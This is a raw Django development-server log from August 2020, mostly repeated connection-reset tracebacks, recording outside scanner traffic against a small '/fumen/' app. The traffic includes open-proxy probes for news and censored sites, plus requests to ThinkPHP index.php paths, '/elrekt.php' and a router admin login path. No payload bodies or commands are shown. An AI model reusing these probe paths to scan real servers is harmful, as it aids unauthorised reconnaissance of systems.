Watching for file changes with StatReloader
Watching for file changes with StatReloader
[23/Aug/2020 16:15:58] "GET /fumen/ HTTP/1.1" 200 49625
[23/Aug/2020 16:15:58] "GET /static/css/fumen.css HTTP/1.1" 404 1669
Not Found: /http:/www.baidu.com/
Not Found: /http:/www.123cha.com/
[23/Aug/2020 17:32:10] "GET http://www.baidu.com/ HTTP/1.1" 404 1673
[23/Aug/2020 17:32:10] "GET http://www.123cha.com/ HTTP/1.1" 404 1677
Not Found: /http:/www.minghui.org/
[23/Aug/2020 17:32:16] "GET http://www.minghui.org/ HTTP/1.1" 404 1681
Traceback (most recent call last):
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 138, in run
    self.finish_response()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 180, in finish_response
    self.write(data)
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 274, in write
    self.send_headers()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 332, in send_headers
    self.send_preamble()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 252, in send_preamble
    self._write(('HTTP/%s %s\r\n' % (self.http_version,self.status)).encode('iso-8859-1'))
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 453, in _write
    result = self.stdout.write(data)
  File "/usr/lib/python3.6/socketserver.py", line 803, in write
    self._sock.sendall(b)
ConnectionResetError: [Errno 104] Connection reset by peer
[23/Aug/2020 17:32:16] "GET http://www.minghui.org/ HTTP/1.1" 500 59
----------------------------------------
Exception happened during processing of request from ('221.11.5.60', 55566)
Traceback (most recent call last):
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 138, in run
    self.finish_response()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 180, in finish_response
    self.write(data)
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 274, in write
    self.send_headers()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 332, in send_headers
    self.send_preamble()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 252, in send_preamble
    self._write(('HTTP/%s %s\r\n' % (self.http_version,self.status)).encode('iso-8859-1'))
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 453, in _write
    result = self.stdout.write(data)
  File "/usr/lib/python3.6/socketserver.py", line 803, in write
    self._sock.sendall(b)
ConnectionResetError: [Errno 104] Connection reset by peer

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 141, in run
    self.handle_error()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 119, in handle_error
    super().handle_error()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 368, in handle_error
    self.finish_response()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 180, in finish_response
    self.write(data)
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 274, in write
    self.send_headers()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 331, in send_headers
    if not self.origin_server or self.client_is_modern():
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 344, in client_is_modern
    return self.environ['SERVER_PROTOCOL'].upper() != 'HTTP/0.9'
TypeError: 'NoneType' object is not subscriptable

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 172, in handle
    self.handle_one_request()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 197, in handle_one_request
    handler.run(self.server.get_app())
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 144, in run
    self.close()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 114, in close
    super().close()
  File "/usr/lib/python3.6/wsgiref/simple_server.py", line 35, in close
    self.status.split(' ',1)[0], self.bytes_sent
AttributeError: 'NoneType' object has no attribute 'split'
----------------------------------------
Not Found: /http:/www.epochtimes.com/
[23/Aug/2020 17:32:16] "GET http://www.epochtimes.com/ HTTP/1.1" 404 1693
Not Found: /http:/www.boxun.com/
[23/Aug/2020 17:32:16] "GET http://www.boxun.com/ HTTP/1.1" 404 1673
Traceback (most recent call last):
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 138, in run
    self.finish_response()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 180, in finish_response
    self.write(data)
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 274, in write
    self.send_headers()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 332, in send_headers
    self.send_preamble()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 252, in send_preamble
    self._write(('HTTP/%s %s\r\n' % (self.http_version,self.status)).encode('iso-8859-1'))
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 453, in _write
    result = self.stdout.write(data)
  File "/usr/lib/python3.6/socketserver.py", line 803, in write
    self._sock.sendall(b)
ConnectionResetError: [Errno 104] Connection reset by peer
Traceback (most recent call last):
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 138, in run
    self.finish_response()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 180, in finish_response
    self.write(data)
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 274, in write
    self.send_headers()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 332, in send_headers
    self.send_preamble()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 252, in send_preamble
    self._write(('HTTP/%s %s\r\n' % (self.http_version,self.status)).encode('iso-8859-1'))
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 453, in _write
    result = self.stdout.write(data)
  File "/usr/lib/python3.6/socketserver.py", line 803, in write
    self._sock.sendall(b)
ConnectionResetError: [Errno 104] Connection reset by peer
[23/Aug/2020 17:32:16] "GET http://www.epochtimes.com/ HTTP/1.1" 500 59
----------------------------------------
Exception happened during processing of request from ('221.11.5.60', 55564)
[23/Aug/2020 17:32:16] "GET http://www.boxun.com/ HTTP/1.1" 500 59
----------------------------------------
Exception happened during processing of request from ('221.11.5.60', 55562)
Traceback (most recent call last):
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 138, in run
    self.finish_response()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 180, in finish_response
    self.write(data)
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 274, in write
    self.send_headers()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 332, in send_headers
    self.send_preamble()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 252, in send_preamble
    self._write(('HTTP/%s %s\r\n' % (self.http_version,self.status)).encode('iso-8859-1'))
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 453, in _write
    result = self.stdout.write(data)
  File "/usr/lib/python3.6/socketserver.py", line 803, in write
    self._sock.sendall(b)
ConnectionResetError: [Errno 104] Connection reset by peer

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 141, in run
    self.handle_error()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 119, in handle_error
    super().handle_error()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 368, in handle_error
    self.finish_response()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 180, in finish_response
    self.write(data)
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 274, in write
    self.send_headers()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 331, in send_headers
    if not self.origin_server or self.client_is_modern():
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 344, in client_is_modern
    return self.environ['SERVER_PROTOCOL'].upper() != 'HTTP/0.9'
TypeError: 'NoneType' object is not subscriptable

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 172, in handle
    self.handle_one_request()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 197, in handle_one_request
    handler.run(self.server.get_app())
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 144, in run
    self.close()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 114, in close
    super().close()
  File "/usr/lib/python3.6/wsgiref/simple_server.py", line 35, in close
    self.status.split(' ',1)[0], self.bytes_sent
AttributeError: 'NoneType' object has no attribute 'split'
----------------------------------------
Traceback (most recent call last):
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 138, in run
    self.finish_response()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 180, in finish_response
    self.write(data)
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 274, in write
    self.send_headers()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 332, in send_headers
    self.send_preamble()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 252, in send_preamble
    self._write(('HTTP/%s %s\r\n' % (self.http_version,self.status)).encode('iso-8859-1'))
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 453, in _write
    result = self.stdout.write(data)
  File "/usr/lib/python3.6/socketserver.py", line 803, in write
    self._sock.sendall(b)
ConnectionResetError: [Errno 104] Connection reset by peer

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 141, in run
    self.handle_error()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 119, in handle_error
    super().handle_error()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 368, in handle_error
    self.finish_response()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 180, in finish_response
    self.write(data)
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 274, in write
    self.send_headers()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 331, in send_headers
    if not self.origin_server or self.client_is_modern():
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 344, in client_is_modern
    return self.environ['SERVER_PROTOCOL'].upper() != 'HTTP/0.9'
TypeError: 'NoneType' object is not subscriptable

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 172, in handle
    self.handle_one_request()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 197, in handle_one_request
    handler.run(self.server.get_app())
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 144, in run
    self.close()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 114, in close
    super().close()
  File "/usr/lib/python3.6/wsgiref/simple_server.py", line 35, in close
    self.status.split(' ',1)[0], self.bytes_sent
AttributeError: 'NoneType' object has no attribute 'split'
----------------------------------------
Not Found: /http:/www.bing.com/
[23/Aug/2020 17:32:16] "GET http://www.bing.com/ HTTP/1.1" 404 1669
Not Found: /http:/www.rfa.org/
[23/Aug/2020 17:32:22] "GET http://www.rfa.org/ HTTP/1.1" 404 1665
Traceback (most recent call last):
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 138, in run
    self.finish_response()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 180, in finish_response
    self.write(data)
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 274, in write
    self.send_headers()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 332, in send_headers
    self.send_preamble()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 252, in send_preamble
    self._write(('HTTP/%s %s\r\n' % (self.http_version,self.status)).encode('iso-8859-1'))
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 453, in _write
    result = self.stdout.write(data)
  File "/usr/lib/python3.6/socketserver.py", line 803, in write
    self._sock.sendall(b)
ConnectionResetError: [Errno 104] Connection reset by peer
[23/Aug/2020 17:32:22] "GET http://www.rfa.org/ HTTP/1.1" 500 59
----------------------------------------
Exception happened during processing of request from ('221.11.5.60', 57382)
Traceback (most recent call last):
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 138, in run
    self.finish_response()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 180, in finish_response
    self.write(data)
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 274, in write
    self.send_headers()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 332, in send_headers
    self.send_preamble()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 252, in send_preamble
    self._write(('HTTP/%s %s\r\n' % (self.http_version,self.status)).encode('iso-8859-1'))
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 453, in _write
    result = self.stdout.write(data)
  File "/usr/lib/python3.6/socketserver.py", line 803, in write
    self._sock.sendall(b)
ConnectionResetError: [Errno 104] Connection reset by peer

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 141, in run
    self.handle_error()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 119, in handle_error
    super().handle_error()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 368, in handle_error
    self.finish_response()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 180, in finish_response
    self.write(data)
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 274, in write
    self.send_headers()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 331, in send_headers
    if not self.origin_server or self.client_is_modern():
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 344, in client_is_modern
    return self.environ['SERVER_PROTOCOL'].upper() != 'HTTP/0.9'
TypeError: 'NoneType' object is not subscriptable

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 172, in handle
    self.handle_one_request()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 197, in handle_one_request
    handler.run(self.server.get_app())
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 144, in run
    self.close()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 114, in close
    super().close()
  File "/usr/lib/python3.6/wsgiref/simple_server.py", line 35, in close
    self.status.split(' ',1)[0], self.bytes_sent
AttributeError: 'NoneType' object has no attribute 'split'
----------------------------------------
Not Found: /http:/wujieliulan.com/
[23/Aug/2020 17:32:22] "GET http://wujieliulan.com/ HTTP/1.1" 404 1681
Traceback (most recent call last):
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 138, in run
    self.finish_response()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 180, in finish_response
    self.write(data)
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 274, in write
    self.send_headers()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 332, in send_headers
    self.send_preamble()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 252, in send_preamble
    self._write(('HTTP/%s %s\r\n' % (self.http_version,self.status)).encode('iso-8859-1'))
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 453, in _write
    result = self.stdout.write(data)
  File "/usr/lib/python3.6/socketserver.py", line 803, in write
    self._sock.sendall(b)
ConnectionResetError: [Errno 104] Connection reset by peer
[23/Aug/2020 17:32:22] "GET http://wujieliulan.com/ HTTP/1.1" 500 59
----------------------------------------
Exception happened during processing of request from ('221.11.5.60', 57376)
Traceback (most recent call last):
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 138, in run
    self.finish_response()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 180, in finish_response
    self.write(data)
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 274, in write
    self.send_headers()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 332, in send_headers
    self.send_preamble()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 252, in send_preamble
    self._write(('HTTP/%s %s\r\n' % (self.http_version,self.status)).encode('iso-8859-1'))
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 453, in _write
    result = self.stdout.write(data)
  File "/usr/lib/python3.6/socketserver.py", line 803, in write
    self._sock.sendall(b)
ConnectionResetError: [Errno 104] Connection reset by peer

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 141, in run
    self.handle_error()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 119, in handle_error
    super().handle_error()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 368, in handle_error
    self.finish_response()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 180, in finish_response
    self.write(data)
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 274, in write
    self.send_headers()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 331, in send_headers
    if not self.origin_server or self.client_is_modern():
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 344, in client_is_modern
    return self.environ['SERVER_PROTOCOL'].upper() != 'HTTP/0.9'
TypeError: 'NoneType' object is not subscriptable

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 172, in handle
    self.handle_one_request()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 197, in handle_one_request
    handler.run(self.server.get_app())
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 144, in run
    self.close()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 114, in close
    super().close()
  File "/usr/lib/python3.6/wsgiref/simple_server.py", line 35, in close
    self.status.split(' ',1)[0], self.bytes_sent
AttributeError: 'NoneType' object has no attribute 'split'
----------------------------------------
Not Found: /www.voanews.com:443
[23/Aug/2020 17:32:22] "CONNECT www.voanews.com:443 HTTP/1.0" 404 1685
Not Found: /
[23/Aug/2020 17:38:45] "GET / HTTP/1.1" 404 2922
Not Found: /
[23/Aug/2020 17:39:18] "GET / HTTP/1.0" 404 2930
Not Found: /http:/175.24.50.211:8080/login/
[23/Aug/2020 18:10:03] "GET http://175.24.50.211:8080/login/ HTTP/1.1" 404 1711
----------------------------------------
Exception happened during processing of request from ('116.128.128.41', 46588)
Traceback (most recent call last):
  File "/usr/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 174, in handle
    self.handle_one_request()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/usr/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
Not Found: /http:/175.24.50.211:8080/fumen/fumen_detail/
[23/Aug/2020 18:12:06] "GET http://175.24.50.211:8080/fumen/fumen_detail/?fumen_id%3D500100365 HTTP/1.1" 404 1771
----------------------------------------
Exception happened during processing of request from ('59.36.132.240', 45923)
Traceback (most recent call last):
  File "/usr/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 174, in handle
    self.handle_one_request()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/usr/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
Not Found: /http:/175.24.50.211:8080/fumen/fumen_detail/
[23/Aug/2020 18:51:57] "GET http://175.24.50.211:8080/fumen/fumen_detail/?fumen_id%3D500100748 HTTP/1.1" 404 1771
----------------------------------------
Exception happened during processing of request from ('182.254.52.17', 32795)
Traceback (most recent call last):
  File "/usr/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 174, in handle
    self.handle_one_request()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/usr/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
Not Found: /http:/175.24.50.211:8080/fumen/
[23/Aug/2020 18:53:46] "GET http://175.24.50.211:8080/fumen/ HTTP/1.1" 404 1711
----------------------------------------
Exception happened during processing of request from ('182.254.52.17', 53166)
Traceback (most recent call last):
  File "/usr/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 174, in handle
    self.handle_one_request()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/usr/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
Not Found: /http:/175.24.50.211:8080/fumen/fumen_detail/
[23/Aug/2020 18:54:07] "GET http://175.24.50.211:8080/fumen/fumen_detail/?fumen_id%3D500100679 HTTP/1.1" 404 1771
----------------------------------------
Exception happened during processing of request from ('182.254.52.17', 56909)
Traceback (most recent call last):
  File "/usr/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 174, in handle
    self.handle_one_request()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/usr/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
Not Found: /
[23/Aug/2020 19:01:07] "GET / HTTP/1.0" 404 2930
Not Found: /http:/175.24.50.211:8080/captchaimage/3491953fc3dbc98391d259ce68cbb02effca6634/
[23/Aug/2020 19:46:53] "GET http://175.24.50.211:8080/captchaimage/3491953fc3dbc98391d259ce68cbb02effca6634/ HTTP/1.1" 404 1855
----------------------------------------
Exception happened during processing of request from ('182.254.52.17', 50352)
Traceback (most recent call last):
  File "/usr/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 174, in handle
    self.handle_one_request()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/usr/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
Not Found: /http:/www.baidu.com/cache/global/img/gs.gif
[23/Aug/2020 19:47:19] "GET http://www.baidu.com/cache/global/img/gs.gif HTTP/1.1" 404 1742
----------------------------------------
Exception happened during processing of request from ('80.82.70.187', 41643)
Traceback (most recent call last):
  File "/usr/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 174, in handle
    self.handle_one_request()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/usr/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
Not Found: /TP/public/index.php
[23/Aug/2020 19:55:54] "GET /TP/public/index.php HTTP/1.1" 404 2997
Not Found: /TP/index.php
[23/Aug/2020 19:55:54] "GET /TP/index.php HTTP/1.1" 404 2976
Not Found: /thinkphp/html/public/index.php
[23/Aug/2020 19:55:54] "GET /thinkphp/html/public/index.php HTTP/1.1" 404 3030
Not Found: /html/public/index.php
[23/Aug/2020 19:55:54] "GET /html/public/index.php HTTP/1.1" 404 3003
Not Found: /public/index.php
[23/Aug/2020 19:55:55] "GET /public/index.php HTTP/1.1" 404 2988
Not Found: /TP/html/public/index.php
[23/Aug/2020 19:55:55] "GET /TP/html/public/index.php HTTP/1.1" 404 3012
Not Found: /elrekt.php
[23/Aug/2020 19:55:55] "GET /elrekt.php HTTP/1.1" 404 2970
Not Found: /index.php
[23/Aug/2020 19:55:55] "GET /index.php HTTP/1.1" 404 2967
Not Found: /users
[23/Aug/2020 19:55:55] "POST /users?page=&size=5 HTTP/1.1" 404 2973
Not Found: /
[23/Aug/2020 19:55:55] "GET / HTTP/1.1" 404 2922
Not Found: /
[23/Aug/2020 20:00:43] "GET / HTTP/1.0" 404 2930
Not Found: /
[23/Aug/2020 20:05:47] "GET / HTTP/1.1" 404 2917
Not Found: /boaform/admin/formLogin
[23/Aug/2020 20:42:35] "POST /boaform/admin/formLogin HTTP/1.1" 404 3010
Not Found: /http:/175.24.50.211:8080/fumen
[23/Aug/2020 21:08:23] "GET http://175.24.50.211:8080/fumen?fumen_creator%3D5 HTTP/1.1" 404 1726
----------------------------------------
Exception happened during processing of request from ('116.128.128.41', 35240)
Traceback (most recent call last):
  File "/usr/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 174, in handle
    self.handle_one_request()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/usr/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
Not Found: /http:/175.24.50.211:8080/home/
[23/Aug/2020 21:17:29] "GET http://175.24.50.211:8080/home/ HTTP/1.1" 404 1708
----------------------------------------
Exception happened during processing of request from ('183.192.179.16', 33440)
Traceback (most recent call last):
  File "/usr/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 174, in handle
    self.handle_one_request()
  File "/usr/local/lib/python3.6/dist-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/usr/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
Not Found: /config/getuser
[23/Aug/2020 21:20:27] "GET /config/getuser?index=0 HTTP/1.1" 404 2990
Not Found: /http:/175.24.50.211:8080/captchaimage/2708d3a4055095fff7ae7ae367aa01312c703e1a/
[23/Aug/2020 21:55:34] "GET http://175.24.50.211:8080/captchaimage/2708d3a4055095fff7ae7ae367aa01312c703e1a/ HTTP/1.1" 404 1855
----------------------------------------
Exception happened during processing of request from ('58.247.212.239', 64280)
Traceback (most recent call last):
  File "/usr/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
